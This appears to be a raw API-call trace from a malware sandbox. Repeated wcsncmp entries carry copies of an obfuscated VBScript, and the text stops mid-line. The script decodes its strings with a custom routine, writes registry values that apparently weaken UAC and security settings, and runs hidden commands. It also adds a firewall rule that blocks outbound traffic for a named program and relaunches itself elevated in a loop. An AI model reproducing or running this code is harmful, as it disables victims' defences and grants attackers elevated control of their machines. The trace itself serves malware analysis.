bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102 [0222.966] wcsncmp (_String1="1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 36 [0222.966] wcsncmp (_String1=",2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 31 [0222.966] wcsncmp (_String1="2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 37 [0222.966] wcsncmp (_String1=",1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite 